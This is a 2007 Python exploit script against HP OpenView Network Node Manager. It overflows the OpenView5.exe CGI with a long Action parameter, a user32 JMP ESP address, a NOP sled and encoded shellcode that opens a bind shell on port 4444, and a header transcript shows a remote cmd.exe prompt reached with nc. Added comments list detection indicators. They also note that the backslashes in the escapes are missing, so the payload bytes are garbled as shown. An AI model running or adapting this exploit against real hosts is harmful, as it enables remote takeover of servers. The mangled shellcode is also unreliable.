# Title : HP OpenView Network Node Manager 07.50 CGI Remote BoF Exploit
# Published : 2007-12-12
# Author : muts
#!/usr/bin/python
# HP OpenView Network Node Manager CGI Buffer Overflow
# Tested on NNM Release B.07.50 / Windows 2000 server SP4
# http://www.zerodayinitiative.com/advisories/ZDI-07-071.html
# Coded by Mati Aharoni
# muts|offensive-security|com
# http://www.offensive-security.com/0day/hpnnm.txt
# Notes:
# Vanilla stack-based overflow
# I had no idea how to debug this...I ended up modifying the Openview5.exe binary by hijacking
# the entry point and injecting Sleep just before exe execution. This gave me enough
# time to attach a debugger before program termination. If anyone knows how to properly
# debug this, please tell me about it - there *must* be a better way...
#
# bt tools # ./sploit 192.168.1.105
# [+] Connecting to 192.168.1.105
# [+] Sending Evil Buffer to NNM CGI
# [+] Payload Sent, ph33r.
#
# bt tools # nc -nv 192.168.1.105 4444
# (UNKNOWN) [192.168.1.105] 4444 (krb524) open
# Microsoft Windows 2000 [Version 5.00.2195]
# (C) Copyright 1985-2000 Microsoft Corp.
#
# C:\Program Files\HP OpenView\www\cgi-bin>
import socket
import os
import sys
# NOTE(review): one-shot Python 2 script (print statements). It takes a single
# positional argument, the target host (sys.argv[1]); there is no argument
# check, so running it with none raises IndexError. `os` is imported but unused.
expl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM )
print "[+] Connecting to "+sys.argv[1]
# Plain TCP to port 80 with no try/finally: a failed connect() raises and the
# socket is simply reclaimed at interpreter exit.
expl.connect ( ( sys.argv[1], 80 ) )
print "[+] Sending Evil Buffer to NNM CGIn"
# The request is one HTTP GET to the NNM CGI /OvCgi/OpenView5.exe whose
# `Action` query parameter is padded with 5123 bytes of "A" before the rest of
# the buffer is appended. For detection this is the distinctive part: a
# request to this CGI carrying a query string of that size is what to alert
# on (see the ZDI-07-071 advisory cited in the file header).
buffer="GET /OvCgi/OpenView5.exe?Context=Snmp&Action="
buffer+="A"*5123
# NOTE(review): as rendered on this page the escape sequences have lost their
# backslashes, so from here on the listing appends literal text such as
# "x29x4c..." rather than the bytes the original inline comments describe.
buffer+="x29x4cxe1x77" # JMP ESP user32.dll Win2kSP4
buffer+="x90"*32
# EXITFUNC=thread LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com */
# The transcript in the file header shows the result: a cmd.exe prompt reached
# with nc on TCP 4444. An NNM host that starts accepting connections on that
# port is the other indicator a defender can watch for.
buffer+=("xebx03x59xebx05xe8xf8xffxffxffx49x49x49x49x49x49"
"x49x49x49x49x49x49x49x49x49x49x49x51x48x5ax6ax68"
"x58x30x41x31x50x41x42x6bx41x41x78x32x41x42x32x42"
"x41x30x42x41x41x58x38x41x42x50x75x6bx59x39x6cx50"
"x6ax78x6bx30x4dx49x78x38x79x59x6fx4bx4fx39x6fx71"
"x70x6ex6bx50x6cx67x54x67x54x4cx4bx72x65x65x6cx4c"
"x4bx41x6cx36x65x42x58x46x61x4ax4fx6cx4bx70x4fx64"
"x58x4cx4bx73x6fx47x50x76x61x7ax4bx50x49x6cx4bx55"
"x64x4ex6bx54x41x7ax4ex65x61x6fx30x6dx49x6cx6cx4e"
"x64x4fx30x71x64x35x57x49x51x4ax6ax56x6dx63x31x5a"
"x62x5ax4bx79x64x77x4bx61x44x57x54x45x78x63x45x78"
"x65x6cx4bx33x6fx44x64x53x31x48x6bx41x76x4cx4bx54"
"x4cx30x4bx6ex6bx43x6fx45x4cx66x61x78x6bx66x63x76"
"x4cx4cx4bx6cx49x42x4cx71x34x65x4cx50x61x48x43x50"
"x31x6bx6bx30x64x4cx4bx50x43x70x30x4ex6bx31x50x64"
"x4cx6cx4bx74x30x47x6cx6ex4dx6ex6bx63x70x75x58x63"
"x6ex62x48x4cx4ex50x4ex74x4ex5ax4cx50x50x4bx4fx4b"
"x66x30x66x30x53x33x56x73x58x66x53x30x32x75x38x70"
"x77x53x43x54x72x33x6fx76x34x6bx4fx6ex30x62x48x6a"
"x6bx38x6dx49x6cx67x4bx50x50x4bx4fx48x56x61x4fx6c"
"x49x38x65x65x36x4bx31x4ax4dx47x78x43x32x32x75x73"
"x5ax64x42x79x6fx38x50x75x38x7ax79x46x69x7ax55x6c"
"x6dx66x37x59x6fx6ex36x76x33x30x53x30x53x50x53x51"
"x43x42x63x70x53x51x53x53x63x4bx4fx4ex30x33x56x62"
"x48x54x51x53x6cx61x76x52x73x4ex69x5ax41x6ex75x75"
"x38x4dx74x66x7ax34x30x6ax67x32x77x6bx4fx79x46x51"
"x7ax46x70x51x41x70x55x4bx4fx38x50x53x58x4ex44x4c"
"x6dx66x4ex78x69x33x67x49x6fx6ex36x50x53x31x45x6b"
"x4fx5ax70x75x38x4dx35x42x69x6bx36x30x49x71x47x79"
"x6fx59x46x56x30x50x54x70x54x30x55x79x6fx48x50x4f"
"x63x52x48x7ax47x70x79x59x56x54x39x51x47x59x6fx58"
"x56x50x55x79x6fx58x50x52x46x73x5ax61x74x63x56x33"
"x58x65x33x52x4dx4dx59x4bx55x33x5ax70x50x56x39x44"
"x69x6ax6cx4dx59x59x77x71x7ax67x34x4cx49x7ax42x54"
"x71x4bx70x79x63x4cx6ax4bx4ex52x62x64x6dx49x6ex30"
"x42x56x4cx4dx43x4cx4dx72x5ax77x48x6cx6bx4cx6bx6c"
"x6bx32x48x31x62x49x6ex6fx43x77x66x6bx4fx50x75x51"
"x54x6bx4fx7ax76x61x4bx72x77x66x32x70x51x36x31x33"
"x61x53x5ax65x51x72x71x61x41x30x55x41x41x79x6fx48"
"x50x32x48x6cx6dx6ex39x45x55x58x4ex61x43x69x6fx6a"
"x76x53x5ax39x6fx4bx4fx46x57x69x6fx6ax70x4ex6bx73"
"x67x49x6cx6dx53x49x54x70x64x6bx4fx4bx66x61x42x6b"
"x4fx48x50x33x58x4ax4fx58x4ex6dx30x35x30x33x63x4b"
"x4fx6bx66x79x6fx58x50x68")
# Request terminator (the blank line ending the HTTP header block); its CR/LF
# escapes are garbled on this page in the same way as the lines above.
buffer+="rnrn"
expl.send (buffer)
expl.close()
print "[+] Payload Sent, ph33r."